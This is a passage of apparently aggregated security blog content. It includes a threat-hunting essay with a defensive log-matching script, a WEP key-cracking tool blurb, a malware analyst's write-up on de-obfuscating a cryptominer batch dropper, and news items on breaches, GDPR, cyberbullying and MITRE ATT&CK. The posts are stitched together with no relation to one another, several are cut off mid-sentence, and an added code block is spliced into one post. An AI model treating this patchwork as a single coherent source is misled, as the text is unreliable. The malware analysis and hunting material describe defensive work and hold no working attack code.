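    """Matching: report only user agents that are already on a list."""
    return sorted({(src, ua) for src, ua in records if ua in known_bad})


def hunt(records, known_bad, limit=20):
    """Hunting input: rare user agents no list covers yet, with their hosts.

    The output is a set of leads for an analyst to investigate, not a verdict.
    """
    hosts = defaultdict(set)
    for src, ua in records:
        hosts[ua].add(src)
    unknown = [(src, ua) for src, ua in records if ua not in known_bad]
    return [(count, ua, sorted(hosts[ua]))
            for count, ua in least_frequent_user_agents(unknown, limit)]


if __name__ == "__main__":
    known_bad = {"Mazilla/4.0"}
    print("matching:", match_known_bad(PROXY_LOG, known_bad))
    print("hunting leads:", hunt(PROXY_LOG, known_bad, limit=1))
    # If the analyst validates a lead, it becomes an input to matching.
    known_bad.add("UpdaterSvc/0.1")
    print("matching after the hunt:", match_known_bad(PROXY_LOG, known_bad))
```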

This is where my threat hunting definition likely diverges from modern practice. Analyst Z sees the results of Chris' hunt and thinks "Chris found user agent XXXX to be malicious, so I should go look for it." Analyst Z queries his or her data and does or does not find evidence of user agent XXXX.

I do not consider analyst Z's actions to be hunting. I consider it matching. There is nothing wrong with this. In fact, one of the purposes of hunting is to provide new inputs to the matching process, so that future hunting trips can explore new assumptions, hypotheses, questions, and methods, and let the machines do the matching on IOCs already found to be suggestive of adversary activity. This is why I wrote in my 2013 book "Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations."

The term "hunting" is a victim of its own success, with emotional baggage. We defenders have finally found a way to make "blue team" work appealing to the wider security community. Vendors love this new way to market their products. "If you're not hunting, are you doing anything useful?" one might ask.

Compared to "I'm threat hunting!" (insert chest beating), the alternative, "I'm matching!" (womp womp), seems sad. 

Nevertheless, we must remember that threat hunting methodologies were invented to find adversary activity for which there were no IOCs. Hunting was IOC-free analysis because we didn't know what to look for. Once you know what to look for, you are matching. Both forms of detection require analysis to validate adversary activity, of course. Let's not forget that.

I'm also very thankful, however it's defined or packaged, that people are excited to search for adversary activity in their environment, whether via matching or hunting. It's a big step from the mindset of 10 years ago, which had a "prevention works" milieu.

tl;dr Because TTPs are a form of IOC, then detection via matching IOCs is a form of matching, and not hunting.

More on Threat Hunting

Earlier this week hellor00t asked via Twitter:

Where would you place your security researchers/hunt team?

I replied:

For me, "hunt" is just a form of detection. I don't see the need to build a "hunt" team. IR teams detect intruders using two major modes: matching and hunting. Junior people spend more time matching. Senior people spend more time hunting. Both can and should do both functions.

This inspired Rob Lee to blog a response, from which I extract his core argument:

[Hunting] really isn’t, to me, about detecting threats...

Hunting is a hypothesis-led approach to testing your environment for threats. The purpose, to me, is not in finding threats but in determining what gaps you have in your ability to detect and respond to them...

In short, hunting, to me, is a way to assess your security (people, process, and technology) against threats while extending your automation footprint to better be prepared in the future. Or simply stated, it’s incident response without the incident that’s done with a purpose and contributes something. 

As background for my answer, I recommend my March 2017 post The Origin of Threat Hunting, which cites my article "Become a Hunter," published in the July-August 2011 issue of Information Security Magazine. I wrote it in the spring of 2011, when I was director of incident response for GE-CIRT.

For the term "hunting," I give credit to briefers from the Air Force and NSA who, in the mid-2000s, briefed "hunter-killer" missions to the Red Team/Blue Team Symposium at the Johns Hopkins University Applied Physics Lab in Laurel, MD.

As a comment to that post, Tony Sager, who ran NSA VAO at the time I was briefed at ReBl, described hunting thus:

[Hunting] was an active and sustained search for Attackers...

For us, "Hunt" meant a very planned and sustained search, taking advantage of the existing infrastructure of Red/Blue Teams and COMSEC Monitoring, as well as intelligence information to guide the search. 

For the practice of hunting, as I experienced it, I give credit to our GE-CIRT incident handlers -- David Bianco,  Ken Bradley, Tim Crothers, Tyler Hudak, Bamm Visscher, and Aaron Wade -- who took junior analysts on "hunting trips," starting in 2008-2009.

It is very clear, to me, that hunting has always been associated with detecting an adversary, not "determining what gaps you have in your ability to detect and respond to them," as characterized by Rob.

For me, Rob is describing the job of an enterprise visibility architect, which I described in a 2007 post:

[W]e are stuck with numerous platforms, operating systems, applications, and data (POAD) for which we have zero visibility. 

I suggest that enterprises consider hiring or assigning a new role -- Enterprise Visibility Architect. The role of the EVA is to identify visibility deficiencies in existing and future POAD and design solutions to instrument these resources.

A primary reason to hire an enterprise visibility architect is to build visibility in, which I described in several posts, including this one from 2009 titled Build Visibility In. As a proponent of the "monitor first" school, I will always agree that it is important to identify and address visibility gaps.

So where do we go from here?

Tony Sager, as one of my wise men, offers sage advice at the conclusion of his comment:

"Hunt" emerged as part of a unifying mission model for my Group in the Information Assurance Directorate at NSA (the defensive mission) in the mid-late 2000's. But it was also a way to unify the relationship between IA and the SIGINT mission - intelligence as the driver for Hunting. The marketplace, of course, has now brought its own meaning to the term, but I just wanted to share some history. 

In my younger days I might have expressed much more energy and emotion when encountering a different viewpoint. At this point in my career, I'm more comfortable with other points of view, so long as they do not result in harm, or a waste of my taxpayer dollars, or other clearly negative consequences. I also appreciate the kind words Rob offered toward my point of view.

tl;dr I believe the definition and practice of hunting has always been tied to adversaries, and that Rob describes the work of an enterprise visibility architect when he focuses on visibility gaps rather than adversary activity.

Update 1: If in the course of conducting a hunt you identify a visibility or resistance deficiency, that is indeed beneficial. The benefit, however, is derivative. You hunt to find adversaries. Identifying gaps is secondary although welcome.

The same would be true of hunting and discovering misconfigured systems, or previously unidentified assets, or unpatched software, or any of the other myriad facts on the ground that manifest when one applies Clausewitz's directed telescope towards their computing environment.

WepAttack – WLAN 802.11 WEP Key Hacking Tool

WepAttack is a WLAN open source Linux WEP key hacking tool for breaking 802.11 WEP keys using a wordlist based dictionary attack.

This tool is based on an active dictionary attack that tests millions of words to find the right key. Only one packet is required to start an attack.

What is a WEP Key?

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.[1] WEP, recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), was at one time widely in use and was often the first security choice presented to users by router configuration tools.

Gmail encryption: Everything you need to know

Encryption may sound like a subject best left to hackers and tinfoil hat wearers, but don't be fooled: It's a critical part of contemporary life and something that's important for everyone, especially business users, to understand. And one of the places where encryption is most relevant and misunderstood is in the realm of email.

If you're using Gmail for electronic communication — be it for business, for personal use, or a combination of the two — it's well worth your while to know how the service does and doesn't secure your information and what steps you can take to make sure you're getting the level of privacy you need.

Ready to dive in?

VirusTotal += Trapmine

We welcome Trapmine scanner to VirusTotal. In the words of the company:

“Trapmine ThreatScore is a machine learning-powered malware detection engine developed to identify known and never-before-seen malware. This engine is a part of TRAPMINE Endpoint Detection & Protection Platform. Trapmine combines machine learning, behavior monitoring and endpoint deception techniques to provide fool-proof defense against malware, exploit attempts, file-less malware, ransomware and other forms of targeted attacks. Windows PE files submitted to VirusTotal will be analyzed by Trapmine ML engine and the verdicts will be displayed to VirusTotal users.”

Trapmine has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by MRG Effitas, an AMTSO-member tester.

Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!

 

As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.

 

 

Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.

 


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉

What is the impact of Brexit on GDPR?

Brexit introduces a host of uncertainties for businesses in the UK, in the remaining EU states, and in other countries that do business with the UK and the wider EU. Data protection has been a particular point of focus in the past year, due to the

The Who, What, and How of Cyberbullying

The internet has allowed society to stay connected in more ways than ever before. We can speak to strangers across the globe, connect with loved ones in an instant, and share our lives publicly. As much as the internet has connected us in positive, eye-opening ways, its interactive nature has also created a new problem for active users everywhere – cyberbullying. Though the problem is becoming all too common, many out there don’t fully understand the ins and outs of cyberbullying. Let’s take a deep dive into the phenomenon.

What is Cyberbullying

Just like it sounds, cyberbullying is when bullies take their insults and ill will to the internet. According to StopBullying.gov, “Cyberbullying is bullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, Text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else.” The key objective of cyberbullying is to embarrass the subject of the attack, though sometimes the bully can view the act as justified revenge or simply non-intentional.

Types of Cyberbullies

Evolved from the classic schoolyard bullies of old, these cyberbullies can actually take a variety of forms depending on their attack vector and intent. In fact, there are said to be four types of cyberbullies: the Vengeful Angel, the Power Hungry Cyberbully, Revenge of the Nerds/Inadvertent Cyberbully, and Mean Girls. The Vengeful Angel bullies in order to protect the weak or other victims, and often takes action to protect a loved one or friend. The Power Hungry archetype, however, is just a nasty, unkind person who wants to display dominance and control over others. Then there are the Inadvertent Cyberbullies, who are usually the ones getting bullied online or in real life and are typically trying to enact some form of justice or revenge anonymously from the web. Mean Girls are the opposite: they take their online actions in order to impress a group of friends or gain social status.

Cyberbullying Methods

Not only is there a variety in the kind of bullies across the web, but also a plethora of types of cyberbullying techniques these meanies use to bother their victims. First and foremost, there’s Harassment, which involves repeated, offensive messages sent to a victim by a bully on some type of online medium. These messages can be rude, personal, and even threatening, with one recent example emerging between two wives of professional hockey players. Similar to harassment is Flaming – an online fight conducted via emails, social media messages, chat rooms, you name it.

Then there are very targeted attacks, named Exclusion and Outing. With Exclusion, cyberbullies select one individual to single out. Exclusion is a popular method, with examples popping up everywhere, from high school students in Iowa to well-known celebrities. With Outing, these harassers share private information, photos, and videos of a single person to humiliate them online. There’s also the anonymous angle, AKA Masquerading, where a cyberbully creates a fake online identity to belittle, harass, and degrade their victim – which a nurse in New Zealand was a victim of for a whopping 5 years.

Next Steps for Both Parents and Kids

Typically, cyberbullying is a common occurrence amongst teens who are navigating the trials and tribulations of middle school and high school. But that doesn’t mean it’s exclusive to teens, and that doesn’t mean there aren’t steps parents and kids alike can take to stop cyberbullying in its tracks.

If you’re the subject of cyberbullying, the first thing you need to do is block the bully. Then, make sure you collect evidence – take screenshots, print the proof, do whatever you can to have material to back up your claim. It depends on the type of cyberbullying at work, but you can also use the internet to your advantage and look up relevant resources, hotlines, and support to aid with your issue.

If you’re a parent, the most important thing is communication. Make yourself available as a resource and remind your kids that they can tell you anything that’s happening in their online world. Beyond that, continuously weave cybersecurity into your family discussions. Remind kids of the simple steps they can take to be safe online, and make sure they know when to flag a cyberbully or online scheme.

There are also technical avenues you can take to protect your kid online. Look into solutions that will help you monitor your family’s online interactions, such as McAfee Safe Family. This solution, for instance, can help you set rules and time limits for apps and websites and see what your kids are up to at a glance. Of course, these solutions are not the be-all and end-all for stopping cyberbullying, but they can help.

Now, there’s still a lot more research that has to be done to fully understand the cyberbullying problem society is faced with. So as this problem continues to evolve, so must the research, solutions, and regulations that will be created to combat the issue. With the right proactive action, people everywhere can stand up to cyberbullies.

To learn more about family safety and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

Risky Business #521 — Bears everywhere

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Cozy Bear is back, Fancy Bear has new tooling
  • Russian government wants DNC lawsuit thrown out
  • Cyber Command submitting samples to VirusTotal
  • Google BGP shenanigans
  • Australian/China Telecom BGP shenanigans
  • All the recent Facebook drama
  • More speculative execution bugs
  • Julian Assange likely to be charged
  • Vault7 leaker facing new charges
  • Phineas Fisher investigation abandoned
  • Bitcoin/Tether link probed by DoJ, btc in free-fall
  • MUCH MOAR

This week’s show is brought to you by Proofpoint.

Sherrod DeGrippo, Proofpoint’s director of threat research and detection is this week’s sponsor guest. Surprisingly, she tells us that ransomware via email is a dead duck.

Links to everything that we discussed are below. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Russia’s Cozy Bear comes out of hiding with post-election spear-phishing blitz | Ars Technica
Russia's Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks | WIRED
Russia wants DNC hack lawsuit thrown out, citing international conventions | ZDNet
Russian Trolls Sue Facebook, Their Old Propaganda Machine
Ukraine detects new Pterodo backdoor malware, warns of Russian cyberattack | Ars Technica
US Cyber Command starts uploading foreign APT malware to VirusTotal | ZDNet
Google goes down after major BGP mishap routes traffic through China | Ars Technica
How China diverts, then spies on Australia's internet traffic
Rob Joyce on Twitter: "I hope this latest fiasco of traffic rerouting through China is the wakeup call for all of us to get serious about addressing the massive and unacceptable vulnerability inherent in today’s BGP routing architecture. https://t.co/dSTVIOltsF"
Everything you need to know about Facebook’s latest crisis - Recode
Facebook has been accused of peddling anti-Semitic conspiracy theories - Vox
Yes, Facebook made mistakes in 2016. But we weren’t the only ones. - The Washington Post
Researchers discover seven new Meltdown and Spectre attacks | ZDNet
The US Department of Justice is reportedly preparing to indict WikiLeaks founder Julian Assange | Business Insider
Julian Assange has been charged, prosecutors reveal inadvertently in court filing
Accused 'Vault 7' leaker to face new charges
Hacking Team Hacker Phineas Fisher Has Gotten Away With It - Motherboard
Bitcoin Price Manipulated by Tether? Justice Department Probing - Bloomberg
A Browser Extension Apparently Stole The Private Facebook Messages Of At Least 81,000 Accounts | Gizmodo Australia
The Hack Millions of People Are Installing Themselves - Motherboard
Facebook patches another bug that could have allowed mass-harvesting of user data | ZDNet
Trump signs bill that creates the Cybersecurity and Infrastructure Security Agency | ZDNet
AWS rolls out new security feature to prevent accidental S3 data leaks | ZDNet
Most ATMs can be hacked in under 20 minutes | ZDNet
Deserialization issues also affect Ruby, not just Java, PHP, and .NET | ZDNet
Adobe ColdFusion servers under attack from APT group | ZDNet
VirtualBox zero-day published by disgruntled researcher | ZDNet
Office 365, Azure users are locked out after a global multi-factor authentication outage | TechCrunch
Cisco says a flaw in its Adaptive Security Appliance allows remote attacks
He Helped People Cheat at Grand Theft Auto. Then His Home Was Raided. - The New York Times
Proofpoint

Instagram Bug Accidentally Reveals User Passwords

Facebook and Instagram have been having a rough go of it this year.

According to The Information, some Instagram users who made use of the platform's new feature received notification that their passwords were showing up in the URL of their web browsers. What's more, this information was also stored on Facebook's servers, causing a greater issue for anyone using a shared computer or an insecure network.

Reports from Fortune indicate that Instagram staff discovered the bug, which only affected a small number of users. The information was reportedly not exposed outside of the company. A spokesperson for Instagram also told Fortune that the tool has been updated and that it's deleting any logged passwords. It’s recommended that any affected users change their passwords and clear their browser history.

Twitter faced a similar issue in May, and urged all of its users to change their passwords after an error in the hashing process saved user passwords in plain text to an internal log rather than masking them.

Stakes are High for Businesses to Meet GDPR Compliance - and They're Feeling the Heat

Instagram published the "download your data" tool in order to comply with the new GDPR regulation and to offer its users a deeper look into all of the data the company had collected about them. The tool allows users to copy their photos, videos, and messages to their computers. Some say that in addition to meeting compliance, this move was meant to cast Facebook in a better light following the Cambridge Analytica scandal.

However, in September, Facebook announced that it had discovered attackers exploited a vulnerability in its code that impacted its "View As" feature, enabling them to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature. Roughly 50 million accounts were affected, with as many as 90 million users required to log back into their accounts across devices.

According to a report from Silicon Republic, Ireland's Data Protection Commission has confirmed that it is investigating the data breach, and that Facebook could face up to $1.6 billion in fines if it is found to have breached GDPR requirements. This could be one of the first major tests of the GDPR legislation.

Consumers and the Enterprise Alike Need to be More Discerning About Security

You would be hard pressed to find an executive who wants his or her company's software to be the one that leaks sensitive customer data, in a cyberattack or otherwise. You would also be hard pressed to find a consumer who’d be happy that organizations holding their most sensitive personally identifiable information have been breached, or that an organization may be leaking their passwords out onto the World Wide Web. As organizations continue to move in the right direction, reviewing the security of the software they purchase more closely, consumers must also leave behind their apathy in favor of adopting practices that help keep them safe online.

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165k batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.
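
The ordering dependency described above, as an added example (not code from the original post, not part of flare-qdb, and not BatchEncryption's actual scheme): a small Python 3 emulator that expands only the `%VAR%` and `%VAR:~start,length%` forms and applies each SET before decoding the next line. The sample script and the names `expand`, `deobfuscate` and `SAMPLE` are constructed for illustration; delayed expansion, `&`-joined commands and control flow are not handled.

```python
import re

# Constructed sample (not taken from XYNT.bat): an "alphabet" variable,
# two variables built from substrings of it, and a final command built
# from those. Each line only decodes if the earlier SETs were applied.
SAMPLE = r'''
@set "k=ohcets"
@set c=%k:~3,1%%k:~2,1%%k:~1,1%%k:~0,1%
@set w=%k:~4,1%%k:~3,1%%k:~5%%k:~-2,1%
%c% %w%
'''

# %NAME% or %NAME:~start[,length]% (the substring forms cmd.exe expands)
_VAR = re.compile(r"%([^%:=\s]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")

# set NAME=value  or  set "NAME=value", with an optional leading @
_SET = re.compile(r'^@?\s*set\s+"?([^=\s"]+)=([^"]*)"?\s*$', re.IGNORECASE)


def substring(value, start, length):
    """Slice like cmd.exe: negative start counts from the end,
    negative length drops that many characters from the end."""
    n = len(value)
    start = max(n + start, 0) if start < 0 else min(start, n)
    if length is None:
        end = n
    elif length < 0:
        end = max(n + length, start)
    else:
        end = min(start + length, n)
    return value[start:end]


def expand(line, env):
    """Expand variable references in one line against env.
    Undefined variables become empty strings, as in a batch file."""
    def repl(match):
        name, start, length = match.groups()
        value = env.get(name.upper(), "")  # names are case-insensitive
        if start is None:
            return value
        return substring(value, int(start),
                         None if length is None else int(length))
    return _VAR.sub(repl, line)


def deobfuscate(script, env=None):
    """Return (log, env): each line after expansion, in execution order,
    and the environment after applying every SET along the way."""
    env = dict(env or {})
    log = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        expanded = expand(line, env)
        log.append(expanded)
        applied = _SET.match(expanded)
        if applied:
            # Apply the SET so later lines can be decoded.
            env[applied.group(1).upper()] = applied.group(2)
    return log, env


if __name__ == "__main__":
    log, _ = deobfuscate(SAMPLE)
    for number, command in enumerate(log, 1):
        print(f"{number:3}: {command}")
    # Expanding only the last line, without the SETs having been applied,
    # decodes nothing: both variables are still undefined.
    print(repr(expand("%c% %w%", {})))
```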

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and executable programs, so unlike breaking on CreateProcess, it will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and its location varies per system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves this function’s offset using Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset. You can then supply that output as the argument to the --useoff switch in your offline machine to inform De-DOSfuscator where the function is located. Alternately, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows the De-DOSfuscator log after inducing the rest of the code to run.


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse having only one cross-reference that seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible anywhere else in the code, it controls whether a function is called to dump information about the command that has been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands, because it dumps the tree in preorder traversal rather than inorder like it was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Police arrest alleged Russian hacker behind huge Android ad scam

Police in Bulgaria have arrested an alleged Russian hacker who may be responsible for a huge Android ad scam that netted $10 million. The individual identified as Alexander Zhukov is a Saint Petersburg native who's been living in Varna, Bulgaria, since 2010 and was apprehended on November 6th after the US issued an international warrant for his arrest, according to ZDNet.

Source: Kommersant

McAfee Leads the Charge to Embrace and Expand the MITRE ATT&CK Framework

In October, I was privileged to attend the two-day MITRE ATT&CK™ conference, where participants and attendees voiced their support for the ATT&CK framework. The event, sponsored by McAfee, served as a forum for sharing insights and best practices for using ATT&CK as a way to describe and demystify the complexities of today’s cyberattacks. MITRE is well known for its threat-based research in cybersecurity, including highly adopted standards and tools like STIX/TAXII and Common Vulnerability Exposure (CVE).

What is the MITRE ATT&CK framework? Why is it so important to the security community?

ATT&CK is a publicly accessible knowledgebase of adversary tactics and techniques based on real-world observations. For the first time ever, the vendor-agnostic ATT&CK framework enables us to standardize the threat intelligence-sharing process and describe how adversaries prepare for, launch, and execute their attacks. Armed with this knowledge, both security vendors and customers can work toward improving their detection and prevention methods.

What makes ATT&CK so robust is the large community of contributors. By making ATT&CK content available to every practitioner worldwide, MITRE has created a growing community that is fostering innovation in open source tools, products, and services based on the framework.

Best of all, ATT&CK provides a common, easy-to-understand language that can be consumed in bite-size chunks. It enables practitioners to explain complex concepts to management and customers by relating the security risks to business.

How are organizations using the ATT&CK framework?

Speakers representing a wide spectrum of organizations—from the government, private sector, and security arena—shared ways in which they are benefitting from ATT&CK:

  • Building industry-specific threat profiles and doing adversary emulation through red teaming: By acting like real-life adversaries, red teams perform penetration testing using threat-specific techniques to detect network and system vulnerabilities and to test the efficacy of security tools. This enables organizations to answer questions that are critical for their security operations team:
    • Is my organization a target, and what kinds of groups are targeting us?
    • How do these adversarial groups operate?
    • Have we seen the adversary before?
    • What is their motivation? What is the potential impact to my organization?

By using ATT&CK, red teams, who are doing the attacking, can easily communicate with and share their findings with blue teams, who are doing the defending.

  • Red team automation at the unit, or atomic test, level: Recently, several assessment tools have emerged that automate testing of detection and prevention on a granular level against a wide range of adversarial techniques identified by ATT&CK. Gartner expects that these tools will gain ground in security operations and may supplant traditional penetration testing.[1]
  • Operationalization of intelligence at a tactical level: Large companies with mature security operations organizations are using ATT&CK as a framework to drive their ongoing security operations center (SOC) activities. Specifically, they are using ATT&CK in the following ways:
    • Improving their detection capabilities by engineering new content to feed into their security information and event management (SIEM) solution, intrusion detection system (IDS), and intrusion prevention system (IPS)
    • Creating hypotheses for hunting adversaries on the network
    • Tracking adversary groups using tactics, techniques, and procedures (TTPs) for SOC processes, such as network security management, forensics, and others
    • Combining ATT&CK with vulnerability management and configuration management to drive overall risk management initiatives, such as prioritizing security architecture and control gaps

What is our role in driving ATT&CK forward?

